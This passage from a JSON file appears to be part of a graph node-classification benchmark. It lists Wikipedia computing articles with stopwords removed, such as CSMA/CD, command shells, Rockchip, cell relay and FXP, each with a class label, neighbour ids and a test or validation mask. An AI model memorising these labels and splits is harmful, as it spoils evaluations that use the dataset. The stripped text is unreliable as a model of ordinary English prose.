      9266,
      1849,
      1728,
      7492,
      10820,
      11337,
      5078,
      6618,
      5339,
      4194,
      3300,
      3301,
      8044,
      2285,
      9581,
      10606,
      2420,
      8700,
      10109
    ],
    "mask": "Test"
  },
  {
    "node_id": 2785,
    "label": 5,
    "text": "Carrier-sense_multiple_access_with_collision_detection:carrier-sense multiple access collision detection carrier-sense multiple access collision detection csma/cd media access control method used notably early ethernet technology local area networking uses carrier-sensing defer transmissions stations transmitting used combination collision detection transmitting station detects collisions sensing transmissions stations transmitting frame collision condition detected station stops transmitting frame transmits jam signal waits random time interval trying resend frame csma/cd modification pure carrier-sense multiple access csma csma/cd used improve csma performance terminating transmission soon collision detected thus shortening time required retry attempted following procedure used initiate transmission procedure complete frame transmitted successfully collision detected transmission following procedure used resolve detected collision procedure complete retransmission initiated retransmission aborted due numerous collisions methods collision detection media dependent shared electrical bus 10base5 10base2 collisions detected comparing transmitted data received data recognizing higher normal signal amplitude bus media carrier sensed receive channel transmitting triggers collision event repeaters hubs detect collisions propagate jam signals collision recovery procedure likened happens dinner party guests talk common medium air speaking guest politely waits current speaker finish two guests start speaking time stop wait short random periods time ethernet time measured microseconds hope choosing random period time guests choose time try speak thus avoiding another collision jam signal jamming signal signal carries 32-bit binary pattern sent data station inform stations collision must transmit maximum jam-time calculated follows maximum allowed diameter ethernet installation limited 232 bits makes round-trip-time 464 bits slot time ethernet 512 bits difference slot time round-trip-time 48 bits 6 bytes maximum jam-time turn means station noting collision occurred sending 4 6 byte long pattern composed 16 1-0 bit combinations note size jam signal clearly minimum allowed frame-size 64 bytes purpose ensure node may currently receiving frame receive jam signal place correct 32-bit mac crc causes receivers discard frame due crc error late collision type collision happens packet allowed protocol standard question 10 megabit shared medium ethernet collision error occurs first 512 bits data transmitted transmitting station late collision said occurred importantly late collisions re-sent nic unlike collisions occurring first 64 octets left upper layers protocol stack determine loss data correctly set csma/cd network link late collisions usual possible causes full-duplex/half-duplex mismatch exceeded ethernet cable length limits defective hardware incorrect cabling non-compliant number hubs network bad nic local collision collision occurs nic opposed wire nic detect local collisions without attempting send information utp cable local collision detected local segment station detects signal rx pair time sending tx pair since two signals different pairs characteristic change signal collisions recognized utp station operating half-duplex functional difference half full-duplex operation regard whether transmit receive pairs permitted used simultaneously channel capture effect phenomenon one user shared medium captures medium significant time period usually 16 frames users denied use medium effect first seen networks using csma/cd ethernet effect data-intense connection dominates multiple-access wireless channel happens ethernet links way nodes back link attempt re-access ethernet protocol communication collision happens two users medium try send time user waits random period time re-accessing link however user wait back random amount time proportional number times successively tried access link channel capture effect happens one user continues win link example user user b try access quiet link time since detect collision user waits random time 0 1 time units user b let say user chooses lower back-off time user begins use link b allows finish sending frame user still send user user b cause another data collision choose random back-off time 0 1 user b choose back-off time 0 3 – b second time colliding row chances win one continues likely win collision battles 16 collisions number tries user backs extended period time user captured channel ability one node capture entire medium decreased number nodes increases number nodes increases higher probability one nodes lower back-off time capturing node channel capture effect creates situation one station able transmit others continually backing thus leading situation short-term unfairness yet situation long-term fair every station opportunity capture medium one station done transmitting efficiency channel increased one node captured channel negative side effect capture effect would idle time created due stations backing one station finished transmitting medium large idle times present stations continually backing instances back-off occur long stations actually discard packets maximum attempt limits reached csma/cd used now-obsolete shared media ethernet variants 10base5 10base2 early versions twisted-pair ethernet used repeater hubs modern ethernet networks built switches full-duplex connections longer need use csma/cd ethernet segment collision domain isolated csma/cd still supported backwards compatibility half-duplex connections ieee 802.3 standard defines ethernet variants historical reasons still bore title carrier sense multiple access collision detection csma/cd access method physical layer specifications 802.3-2008 uses new name ieee standard ethernet",
    "neighbors": [
      10112,
      2306,
      388,
      1541,
      8708,
      3847,
      7698,
      10005,
      5270,
      11288,
      2458,
      5020,
      2211,
      1192,
      11560,
      7723,
      11181,
      816,
      2998,
      7865,
      5185,
      7490,
      9284,
      5321,
      6857,
      7498,
      2911,
      2912,
      5092,
      5863,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 2786,
    "label": 2,
    "text": "Comparison_of_command_shells:comparison command shells command shell command line interface computer program operating system background execution allows shell run command background posix shells unix shells allow background execution using character end command powershell use codice_1 codice_2 commands completion features assist user typing commands command line looking suggesting matching words incomplete ones completion generally requested pressing completion key often key command name completion completion name command shells command program command path usually codice_3 builtin command function alias path completion completion path file relative absolute wildcard completion generalization path completion expression matches number files using supported syntax file matching variable completion completion name variable name environment variable shell variable bash zsh fish completion variable names powershell completions environment variable names shell variable names — within user-defined functions — parameter names command argument completion completion specific command arguments two types arguments named positional named arguments often called options identified name letter preceding value whereas positional arguments consist value shells allow completion argument names support completing values bash zsh fish offer parameter name completion definition external command distributed separate completion definition file command parameter name/value completions shells assume path/filename completion completion defined command completion set suggest completions calling shell function fish shell additionally supports parsing man pages extract parameter information used improve completions/suggestions powershell types commands cmdlets functions script files inherently expose data names types valid value ranges/lists argument metadata used powershell automatically support argument name value completion built-in commands/functions user-defined commands/functions well script files individual cmdlets also define dynamic completion argument values completion values computed dynamically running system user shell may find he/she typing something similar user typed shell supports command history user call previous command line editor edit issuing shells support completion may also able directly complete command command history given partial/initial part previous command modern shells support command history shells support command history general also support completion history rather recalling commands history addition plain command text powershell also records execution start- end time execution status command history mandatory arguments/parameters arguments/parameters must assigned value upon invocation command function script file shell determine ahead invocation missing mandatory values assist interactive user prompting values instead letting command fail shell prompt missing values allow author script command function mark parameter mandatory instead creating script code either prompt missing values determining run interactively fail message powershell allows commands functions scripts define arguments/parameters mandatory shell determines prior invocation mandatory arguments/parameters bound prompt user value actual invocation automatic suggestions shell monitors interactive user typing displays context-relevant suggestions without interrupting typing instead user explicitly requesting completion powershell integrated scripting environment use discoverable metadata provide intellisense i.e suggestions automatically pops user types addition user explicitly requests completion lists pressing e.g shell may record locations user used current locations allow fast switching location/directory history one uses zsh directory stack record directory history particular auto_pushd option advanced cd arguments completion used purpose powershell allows multiple named stacks used locations directories pushed onto/popped current stack named stack stack become current default stack unlike shells powershell location concept allow location stacks hold file system locations well location types like e.g active directory organizational units/groups sql server databases/tables/objects internet information server applications/sites/virtual directories 4dos take command console record history current directories allows user switch directory history using popup window directory name used directly command implicitly changes current location directory must distinguished unrelated load drive feature supported concurrent dos multiuser dos system manager real/32 drive letter l implicitly updated point load path loaded application thereby allowing applications refer files residing load directory standardized drive letter instead absolute path command line match command arguments directly spell checking automatically correct common typing mistakes case sensitivity missing letters two approaches shell either suggest probable corrections upon command invocation happen earlier part completion autosuggestion tcsh zsh shells feature optional spell checking/correction upon command invocation fish autocorrection upon completion autosuggestion feature therefore way typing whole command pressing enter whereas extensive use tab right-arrow keys makes shell mostly case insensitive psreadline powershell module shipped version 5.0 provides option specify commandvalidationhandler scriptblock runs submitting command allows custom correcting commonly mistyped commands verification actually running command integrated environment integration command-line interface editors typically multiple documents help system possibly debugging tools take command console tcc comes integrated environment command line pane file explorer editor batch debugger powershell ise includes command line pane support integrated command line copy-paste multiple document editors source-level debugging help pane command explorer pane scripting interface allowing scripts/modules manipulate menus add-ons etc ise menus windows shortcuts addons customizable scripts snippets small regions reusable script code snippets often used save keystrokes assist user common scripting patterns many text editors support snippets scripting either built-in functionality plugins powershell supports snippets integrated scripting environment ise using shell script prompt interactive user value shell script present interactive user list choices shell script job report progress long running tasks interactive user unix/linux systems may offer tools support using progress indicators scripts standalone-commands program pv integrated features shells however powershell built-in command api functions used authoring commands writing/updating progress bar progress bar messages sent separates regular command output progress bar always displayed ultimate interactive users console regardless whether progress messages originates interactive script background job remote session output command execution displayed table/grid interactively sorted filtered and/or otherwise manipulated command execution ends powershell out-gridview cmdlet displays data interactive window interactive sorting filtering jp software command-line processors provide user-configurable colorization file directory names directory listings based file extension and/or attributes optionally defined colordir environment variable unix/linux shells feature ls command terminal command line processors dos plus multiuser dos real/32 versions dr-dos support number optional environment variables define escape sequences allowing control text highlighting reversion colorization display print purposes commands like type mentioned command line processors support defined sequences emitted filenames typical sequence would \\033 1m conjunction ansi.sys \\033p ascii terminal \\016 ibm esc/p printer likewise typical sequences would \\033 0m \\033q \\024 respectively variables header footer supported command.com dr-dos 7.02 higher define sequences emitted text blocks order control text highlighting pagination formatting options unix/linux shells feature terminal independent project offers syntax highlighting add-on z shell zsh part shell however powershell provides customizable syntax highlighting command line psreadline module module used powershell v3.0+ included v5.0 additionally loaded default command line host powershell.exe v5.0 powershell ise also includes syntax highlighting command line well script pane take command console tcc offers syntax highlighting integrated environment 4dos 4os2 4nt take command console powershell powershell ise looks context-sensitive help information pressed zsh provides various forms configurable context-sensitive help part run-help widget _complete_help command completion options commands command builder guided dialog assists user filling command powershell command builder available powershell ise displayed separately show-command cmdlet anticipation given running application may accept keyboard input user shell instructs shell generate sequence simulated keystrokes application interpret keyboard input interactive user sending keystroke sequences user may able direct application perform actions would impossible achieve input redirection would otherwise require interactive user example application acts keystrokes redirected distinguishes normal extended keys flushes queue accepting new input startup certain conditions read standard input keystroke stacking typically also provides means control timing simulated keys sent delay new keys queue flushed etc also allows simulate keys present keyboard corresponding keys physically exist different keyboard layout used therefore would impossible type user shell scripts need query user sensitive information passwords private digital keys pin codes confidential information sensitive input echoed back screen/input device could gleaned unauthorized persons plaintext memory representation sensitive information also avoided could allow information compromised e.g. swap files core dumps etc shells bash zsh powershell offer specific feature shells offer specific feature may still able turn echoing means shells executing unix/linux operating system use stty external command switch off/on echoing input characters addition echoing back characters powershell -assecurestring option also encrypts input character-by-character input process ensuring string never represented unencrypted memory could compromised memory dumps scanning transcription etc script reads password environment variable memory plain text thus may accessed via core dump also process environment may accessible processes started script powershell work encrypted string variables/parameters encrypted variables ensure values inadvertently disclosed e.g transcripts echo'ing logfiles memory crash dumps even malicious memory scanning powershell also supports saving encrypted strings text files protected key owned current user operating systems define execute permission granted users/groups file unix systems execute permission controls access invoking file program applies executables scripts permission enforced program loader obligation needed invoking program invoked program enforcing execute permission also goes shells interpreter programs behaviour mandated posix c library used interfacing kernel posix specifies codice_4 family functions shall fail eaccess permission denied file denies execution permission see execute permission applies script run directly script invoked argument interpreting shell executed regardless whether user holds execute permission script although windows also specifies execute permission none windows-specific shells block script execution permission granted shells block scripts determined untrustworthy refuse run scripts mandated system administrator powershell set block execution scripts marked obtained unknown/untrusted origin e.g internet internet facing applications web browsers im clients mail readers etc mark files downloaded internet origin zone alternate data stream understood powershell script/code signing policies used ensure operations department run approved scripts/code reviewed signed trusted reviewer/approver signing regimes also protects tampering script sent vendor client client use signing ensure script tampered transit script indeed originates vendor attacker trying social engineer operator running attack script powershell set allow execution otherwise blocked scripts e.g originating untrusted zone script digitally signed using trusted digital certificate company may want enforce execution restriction globally within company and/or certain parts company may want set policy running signed scripts allow certain parts company set policies zoned restrictions powershell allows script blocking policies enforced multiple levels local machine current user etc higher level policy overrides lower level policy e.g policy defined local machine place users local machine left undefined higher level defined lower levels several shells started configured start mode limited set commands actions available user security boundary command accessing resource blocked rather resource nevertheless typically used restrict users actions logging restricted mode part posix specification shells linux/unix shells support mode several built-in commands disabled external commands certain directory invoked powershell supports restricted modes session configuration files session configurations session configuration file define visible available cmdlets aliases functions path providers scripts invoke scripts security risk potentially execute foreign code context user launched initial script scripts usually designed exclusively include scripts known safe locations instances e.g offering user way configure environment loading localized messages script may need include scripts/files one way address risk shell offer safe subset commands executed included script powershell data sections contain constants expressions using restricted subset operators commands powershell data sections used e.g localized strings needs read external source protecting unwanted side effects",
    "neighbors": [
      1408,
      516,
      2181,
      4870,
      8966,
      6797,
      8975,
      3216,
      3856,
      10771,
      11413,
      3350,
      10518,
      1304,
      2201,
      10394,
      6813,
      7325,
      929,
      7847,
      5032,
      10924,
      7983,
      11184,
      178,
      11442,
      4277,
      823,
      4409,
      5177,
      10428,
      7999,
      8001,
      5698,
      10436,
      9931,
      10960,
      213,
      11481,
      8414,
      6498,
      8675,
      9444,
      485,
      11363,
      9320,
      2665,
      5612,
      621,
      5872,
      5492,
      3573,
      9078,
      4727,
      3323,
      1277,
      4859
    ],
    "mask": "Test"
  },
  {
    "node_id": 2787,
    "label": 5,
    "text": "Carrier_system:carrier system carrier system telecommunications system transmits information voice signals telephone call video signals television modulation one multiple carrier signals principal voice frequency data rate carrier systems typically transmit multiple channels communication simultaneously shared medium using various forms multiplexing prominent multiplexing methods carrier signal time-division multiplexing tdm frequency-division multiplexing fdm cable television system example frequency-division multiplexing many television programs carried simultaneously coaxial cable sending different frequency multiple layers multiplexing may ultimately performed upon given input signal example public switched telephone network many telephone calls sent shared trunk lines time-division multiplexing long distance calls several channels may sent communications satellite link frequency-division multiplexing given receiving node specific channels may demultiplexed individually purpose carrier systems save money carrying traffic less infrastructure 19th century telephone systems operating baseband could carry one telephone call wire hence routes heavy traffic needed many wires 1920s frequency-division multiplexing could carry several circuits balanced wires 1930s l-carrier similar systems carried hundreds calls time coaxial cables capacity systems increased middle century 1950s researchers began take seriously possibility saving money terminal equipment using time-division multiplexing work led t-carrier similar digital systems local use due shorter repeater spacings required digital systems long-distance still used fdm late 1970s optical fiber improved point digital connections became cheapest ones distances short long end century analog connections within telephone exchanges became rare",
    "neighbors": [
      3168,
      8192,
      7490,
      355,
      4963,
      6857,
      5162,
      3115,
      7498,
      8811,
      2994,
      6290,
      3156
    ],
    "mask": "Test"
  },
  {
    "node_id": 2788,
    "label": 3,
    "text": "Rockchip:rockchip rockchip fuzhou rockchip electronics co. ltd. chinese fabless semiconductor company based fuzhou fujian province rockchip founded 2001 offices shanghai beijing shenzhen hangzhou hong kong designs system chip soc products using arm architecture licensed arm holdings majority projects rockchip ranked one top50 fabless company ic suppliers worldwide company established cooperation google microsoft intel 27 may 2014 intel announced agreement rockchip adopt intel architecture entry-level tablets rockchip supplier socs chinese white-box tablet manufacturers well supplying oems asus hp samsung toshiba market socs tablets rockchip faces competition allwinner technology mediatek intel actions semiconductor spreadtrum leadcore technology samsung semiconductor qualcomm broadcom via technologies amlogic establishing position early developing chinese tablet soc market 2012 faced challenge allwinner 2012 rockchip shipped 10.5 million tablet processors compared 27.5 million allwinner however q3 2013 rockchip forecast ship 6 million tablet-use application processors china compared 7 million allwinner mainly shipped single-core products rockchip reported number one supplier tablet-use application processors china q4 2013 q1 2014 q2 2014 chinese soc suppliers cellular baseband technology disadvantage compared companies mediatek also supply smartphone market white-box tablet makers increasingly add phone cellular data functionality products intel corporation made investments tablet processor market heavily subsidizing entry low-cost tablet market 2014 may 2014 intel announced agreement rockchip jointly deliver intel-branded mobile soc platform based intel atom processor 3g modem technology terms agreement two companies deliver intel-branded mobile soc platform quad-core platform based intel atom processor core integrated intel 3g modem technology expected available first half 2015 intel rockchip sell new part oems odms primarily company existing customer base october 2014 rockchip already offering intel xmm 6321 low-end smartphones two chips dual-core application processor either intel processor cores arm cortex-a5 cores integrated modem xg632 integrated rf chip ag620 originates cellular chip division infineon technologies intel acquired time ago application processor may also originate infineon intel rockchip earlier targeted smartphone space material way",
    "neighbors": [
      3585,
      7170,
      8720,
      11282,
      9235,
      11289,
      4124,
      1057,
      38,
      4139,
      3117,
      8237,
      9774,
      2097,
      8250,
      1083,
      8253,
      10303,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      9851,
      638,
      644,
      11396,
      9863,
      8842,
      1682,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      7354,
      8383,
      10945,
      9928,
      4821,
      2788,
      3301,
      9964,
      9970,
      6391,
      3835,
      2814,
      5384,
      781,
      6925,
      2838,
      7456,
      5417,
      3883,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      9541,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      7008,
      1377,
      9581,
      11629,
      6001,
      373,
      6009,
      8058,
      392,
      1428,
      410,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      3043,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 2789,
    "label": 2,
    "text": "SIO_(software):sio software sio serial port driver package os/2 written raymond l. gwinn designed improve performance os/2 default serial drivers also improve compatibility sio contains virtualized fossil vx00 driver loaded provide fossil support dos based communications software sio later added ability create virtualized com ports combined included program vmodem allows incoming telnet connections directed toward virtualized com port older communications software also able call telnet sites possible due custom set commands allow users pass hostname vmodem software sio included vmodem software became popular among bulletin board system operators due incoming telnet feature well drastic speed improvements telnet solutions time",
    "neighbors": [
      11112,
      697,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2790,
    "label": 2,
    "text": "Memory_ballooning:memory ballooning memory ballooning technique used eliminate need overprovision host memory used virtual machine vm implement virtual machine kernel implements balloon driver allocates unused memory within vm address space reserved memory pool balloon unavailable processes vm however rather reserved uses within vm physical memory mapped pages within vm actually unmapped vm host operating system hypervisor making available uses host machine depending amount memory required vm size balloon may increased decreased dynamically mapping unmapping physical memory required vm",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2791,
    "label": 3,
    "text": "Apollo_VP3:apollo vp3 apollo vp3 alias eteq 6628 x86 based socket 7 chipset manufactured via technologies launched 1997 time apollo vp3 high performance cost effective energy efficient chipset offered agp support socket 7 processors supported moment intel sis ali chipsets november 1997 fic released motherboard pa-2012 uses apollo vp3 agp bus first socket 7 motherboard supporting agp apollo vp3 supports 32 bits socket 7 cpu-s like pentium pentium mmx amd k5 amd k6 cyrix 6x86 winchip c2 c6 cpu-s uses vt82c597 vt82c597at baby atx motherboards northbridge controller chip ac97 compliant vt82c586b southbridge chip acpi power management system vp3 64 bits memory bus 32 bits 33 mhz pci 32 bits 66 mhz agp 2x sideband addressing 133 mhz signalling 533 mb/s transfer capability interfaces uses integrated 10-bits tag comparator supports 2 mb pipelined burst synchronous sram cache memory 1 gb ecc cachable ram memory memory controller supports 8 memory pages banks interleaving mode flexible row column addresses concurrent dram writeback read around write capability burst read write operations etc details see officially supported speeds memory bus 50 60 66 mhz numerous implemented motherboards vp3 also 75 even 83 mhz bus speed capability vt82c597 northbridge supports six memory banks dram-s dimm-s 1gb total size memory controller supports standard fast page mode fpm dram edo-dram synchronous dram sdram also sdram-ii double data rate ddr flexible mixed configuration synchronous dram interface allows zero wait state bursting dram data buffers 66 mhz six memory banks dram used arbitrary mixture 1mb 2mb 4mb 8mb 16mbxn dram dimm modules memory controller 3,3 v 5 v tolerant interface vt82c586b includes udma-33 eide usb keyboard/ps2-mouse interfaces chip rtc plus 256 kb cmos anandtech described apollo vp3 combination via apollo vp2 intel 440lx chipsets apollo vp3 quite shortly replaced via apollo mvp3 chipset offers faster 100 mhz memory bus capability asynchronous memory bus supports somewhat less amount cachable memory area system dram four memory banks lack 100 mhz bus support needed newer amd cyrix etc. super socket 7 processors pushed via drop vp3 production majority motherboards basis apollo vp3 chipset implemented 512 kb l2 cache memory single 32kb tag-ram chip 2 rarely 3 168-pin dimm slots plus 2 rarely 4 72-pin simm slots agp slot 2-4 pci slots 2-3 isa slots extremes fic pa-2012 shuttle hot-595 1024 kb 512 kb l2 cache memory three 168-pin dimm slots 1 agp 4 pci 2 isa tyan trinity atx s1592s three 168-pin dimm slots plus four 72-pin so-dimm slots 1 agp 4 pci 3 isa apollo vp3 chipset sold soyo also name eteq 6628 chipset",
    "neighbors": [
      8035,
      3588,
      6151,
      6314,
      3883,
      1677,
      2383,
      7151,
      6033,
      499,
      473,
      8090,
      4252,
      2525,
      799
    ],
    "mask": "None"
  },
  {
    "node_id": 2792,
    "label": 3,
    "text": "Gunfright:gunfright gunfright arcade adventure video game developed ultimate play game published u.s. gold first released zx spectrum 1985 ported amstrad cpc msx later year game player takes role sheriff town black rock tasked eliminating outlaws scattered throughout settlement game developed directly nightshade re-uses latter game filmation ii game engine allows images rendered without overlapping game received mostly positive reviews upon release praise directed graphics presentation criticism directed game similarity nightshade later included rare replay rare 2015 xbox one retrospective compilation game presented isometric format set fictional town black rock player takes role sheriff quickdraw main objective game track kill gang outlaws hiding town game begins first-person perspective targeting minigame vertically scrolling bags money shot using crosshairs shooting bags give player initial sums money used purchase ammunition game quickdraw must locate wanted outlaws one one outlaw found shot shooting outlaw kill initiates duel game shifts first-person targeting minigame time player must shoot rapidly moving outlaw quickly possible player either wait outlaw draw take initiative shoot first make bandit draw weapon well player successfully shoots outlaw bounty paid increasing every round new outlaw enters town gameplay players often encounter helpful residents point way outlaws residents need protected gameplay player pay fine shot either bandits sheriff quickdraw outlaws mounted horseback meaning player may saddle imaginary horse pursue game developed isometric projection game engine known filmation ii used previously ultimate 1985 zx spectrum game nightshade filmation engine created stamper brothers portray 3d imagery filmation ii used image masking technique drew filled holes background allowing game create composite structures pixelated drawings without visual overlay despite limitations platforms zx spectrum offered gunfright initially released zx spectrum 1985 last game developed direct involvement stamper brothers realising graphical limits platforms zx spectrum pushed future projects blackwyche dragon skulle handed designer brothers dave bob thomas often uncredited work gunfright along knight lore alien 8 nightshade re-released msx 1986 gunfright sabre wulf ported amstrad cpc later year gunfright later included august 2015 xbox one compilation 30 rare titles rare replay game received mostly positive reviews upon release reviewers writing crash praised game graphics highly detailed colourful stated game visually similar ultimate immediately previous game nightshade gwyn hughes sinclair thought graphics best aspect game despite similarly comparing nightshade hughes also praised game smooth animation techniques used portray western town reviewer cvg suggested game style gameplay mix nightshade nintendo duck hunt reviewing msx version reviewer computer gamer praised game plot complimentary way game able separate ultimate previous game used filmation engine reviewers writing crash praised gameplay stating game element considerably developed several different stages highly addictive writers cvg criticised gameplay noting found difficult distinguish outlaws male inhabitants town also noted absence puzzle elements considered unusual ultimate game bill bennett computer similarly considered omission puzzle elements unusual welcomed witty change genre previous dungeon-themed video games",
    "neighbors": [
      320,
      4102,
      9191,
      9254,
      9006,
      10931,
      4278,
      5820,
      2173
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2793,
    "label": 5,
    "text": "Cell_relay:cell relay computer networking cell relay refers method statistically multiplexing small fixed-length packets called cells transport data computers kinds network equipment unreliable connection-oriented packet switched data communications protocol cell relay transmission rates usually 56 kbit/s several gigabits per second atm particularly popular form cell relay commonly used home dsl connections often runs 128 kbit/s 1.544 mbit/s ds1 high-speed backbone connections oc-3 faster cell relay protocols neither flow control error correction capability information-content independent correspond layers one two osi reference model cell relay used delay- jitter-sensitive traffic voice video cell relay systems break variable-length user packets groups fixed-length cells add addressing verification information frame length fixed networking hardware based time delay user packet-length considerations one user data message may segmented many cells cell relay systems may also carry bitstream-based data pdh traffic breaking streams cells lightweight synchronization clock recovery shim thus cell relay systems may potentially carry combination stream-based packet-based data form statistical time division multiplexing cell relay implementation fast packet-switching technology used connection-oriented broadband integrated services digital networks b-isdn better-known supporting technology atm connectionless ieee 802.6 switched multi-megabit data service smds time information transmitted switch basically sends data units connections ’ negotiated like circuit switching channels ’ allocated channels exist atm condition adequate amount bandwidth maintain indefinite transmissions facility cell relay utilizes data cells persistent size frames comparable data packets however contrast cells may fluctuate size based circumstances type technology secure reason procedures support error handling data recovery per se delicate significant transmissions may perhaps transported faster via fixed-sized cells simpler transmit compared variable-sized frames packets cell relay extremely reliable transporting vital data switching devices give precise method cells endpoint address embedded cell example cell relay atm prevalent form utilized transfer cell fixed size 53 bytes",
    "neighbors": [
      2912,
      8192,
      11591,
      2701,
      4918
    ],
    "mask": "Test"
  },
  {
    "node_id": 2794,
    "label": 1,
    "text": "World_Database_on_Protected_Areas:world database protected areas world database protected areas wdpa largest assembly data world terrestrial marine protected areas containing 200,000 protected areas october 2017 records covering 245 countries territories throughout world wdpa joint venture united nations environment programme world conservation monitoring centre unep-wcmc international union conservation nature iucn world commission protected areas wcpa data wdpa collected international convention secretariats governments collaborating ngos role custodian allocated protected areas programme unep-wcmc based cambridge uk hosted database since creation 1981 wdpa delivers invaluable information decision-makers around world particularly terms measuring extent effectiveness protected areas indicator meeting global biodiversity targets october 2010 unep-wcmc launched social media-based website protected planet allows users interact improve data currently recorded world database protected areas. br wdpa uses iucn definition protected area main criteria entries included database database contains comprehensive information different types protected areas ranging strictly protected conservation purposes sustainable use natural resources allowed includes government co-managed private community-managed areas iucn world commission protected areas gives international guidance categorisation protected areas protected area management categories categories recognised worldwide facilitate global system defining recording protected areas within wpda iucn management category protected area listed one assigned/reported part information protected area data held wdpa made 'attribute 'spatial information attribute data refers characteristics protected area name reported area designation type spatial data provided form geographical information system gis electronic maps often referred shapefiles files provide information location latitude longitude spatial extent protected area either midpoint location polygon shows boundaries protected area gives indication size shape form data takes protected planet data wdpa available public use worldwide wdpa development team unep-wcmc formal agreement global biodiversity information facility gbif integrate network species occurrence data shapefiles protected areas wdpa assists governmental non-governmental private organisations visualise density species within protected area protected areas within wdpa assigned national international designation many protected areas fall category nationally designated designated within country national territory including maritime economic exclusive zone using appropriate legislation agreements internationally designated sites primarily significant environmental cultural natural value protected irrespective territory located areas often recognized preserved protected international treaty convention cases internationally recognized site may nationally designated well common international conventions protected areas designated unesco seeks encourage identification protection preservation cultural natural heritage around world considered outstanding value humanity embodied international treaty called convention concerning protection world cultural natural heritage adopted unesco 1972 man biosphere programme mab proposes interdisciplinary research agenda capacity building aim improve relationship people environment globally since launch 1970 mab concentrated development world network biosphere reserves wnbr biosphere reserve concept developed initially 1974 substantially revised 1995 adoption unesco general conference statutory framework seville strategy biosphere reserves convention wetlands intergovernmental treaty adopted 2 february 1971 iranian city ramsar southern shore caspian sea convention entered force 1975 mission adopted parties 1999 refined 2002 “ conservation wise use wetlands local regional national actions international cooperation contribution towards achieving sustainable development throughout world ” comprehensive global inventory world protected areas wdpa key resource managing researching protected areas order conserve world living resources protected planet information wdpa openly available numerous formats used within biological science community also individuals government agencies non-profit organisations private sector businesses wdpa used predominantly following purposes protected planet developed database internet portal wdpa intention user-friendly enabling users visualise explore measure protected areas interactive maps summary statistics tools aim development reduce burden data gathering make collection protected areas efficient whereas wdpa previously reliant assistance numerous national agencies hindered incomplete information protected area sites constant need updates protected planet launched convention biological diversity 10th conference parties nagoya japan october 2010 largely funded investment private sector acts new-age infrastructure downloading protected area data registered users hosted multiple servers across globe registered data providers range single individual large global organisation web technology utilised improve searching options search results displayed generate better data downloads produce standardized format minimum fields requiring completion fact protected planet open academics scientists students researchers park managers local communities enables use online tools generate date statistics protected areas employ feedback users make improvements using social networking tools protected planet allows wdpa displayed alongside additional resources photos points interest nearby protected areas interoperability discovery information wikipedia global biodiversity information facility gbif panoramio photo services category science technology cambridgeshire category scientific databases",
    "neighbors": [
      7226
    ],
    "mask": "None"
  },
  {
    "node_id": 2795,
    "label": 7,
    "text": "Cloud-computing_comparison:cloud-computing comparison following comparison cloud-computing software providers paas providers run iaas providers means provider paas iaas",
    "neighbors": [
      7937,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      1435,
      9245,
      2720,
      6307,
      9766,
      5031,
      5159,
      6444,
      5677,
      8495,
      3121,
      7352,
      2496,
      4289,
      8644,
      1224,
      2504,
      8520,
      7628,
      4429,
      7248,
      9297,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      8554,
      3819,
      7660,
      10090,
      3705,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 2796,
    "label": 4,
    "text": "MacScan:macscan macscan anti-malware utility apple mac os x developed securemac aimed removing malware including spyware trojan horses keystroke loggers tracking cookies first anti-spyware program released mac os x addition application scans remote administration programs like apple remote desktop allowing users verify programs installed authorization unlike anti-malware applications available mac os x systems macscan scans exclusively malware affects macs opposed scanning forms known threats would include windows malware given considerably less mac-based malware windows-based malware macscan definition files smaller optimized full version macscan available shareware 30-day trial available free developer website download macscan started discussion securemac.com forums developed response specific user concerns malware securemac developed keep mac platform secure scanning viruses malware addition selling flagship product securemac releases special-purpose removal utilities public free charge threat might compromise broader platform releases included utilities remove particular threat designed remove free",
    "neighbors": [
      10756,
      7983,
      8978,
      10392,
      7515,
      7965
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2797,
    "label": 5,
    "text": "File_eXchange_Protocol:file exchange protocol file exchange protocol fxp fxsp method data transfer uses ftp transfer data one remote server another inter-server without routing data client connection conventional ftp involves single server single client data transmission done two fxp session client maintains standard ftp connection two servers direct either server connect initiate data transfer advantage using fxp ftp evident high-bandwidth server demands resources another high-bandwidth server low-bandwidth client network administrator working away location authority access resources servers enabling fxp support make server vulnerable exploit known ftp bounce result ftp server software often fxp disabled default sites restricted ip addresses trusted sites limit risk ftp servers glftpd cuftpd raidenftpd drftpd wzdftpd support negotiation secure data channel two servers using either ftp protocol extension commands cpsv sscn normally works client issuing cpsv lieu pasv command—or sending sscn prior pasv transfers—which instructs server create either ssl tls connection however methods—cpsv sscn—may susceptible man-in-the-middle attacks two ftp servers verify ssl certificates sscn first introduced raidenftpd smartftp 2003 widely adopted although fxp often considered distinct protocol fact merely extension ftp protocol specified protocol standardized subset rfc 959 ietf",
    "neighbors": [
      10242,
      3847,
      649,
      4490,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      3362,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      1607,
      2887,
      8265,
      2509,
      9933,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      5113,
      7546,
      6651,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2798,
    "label": 9,
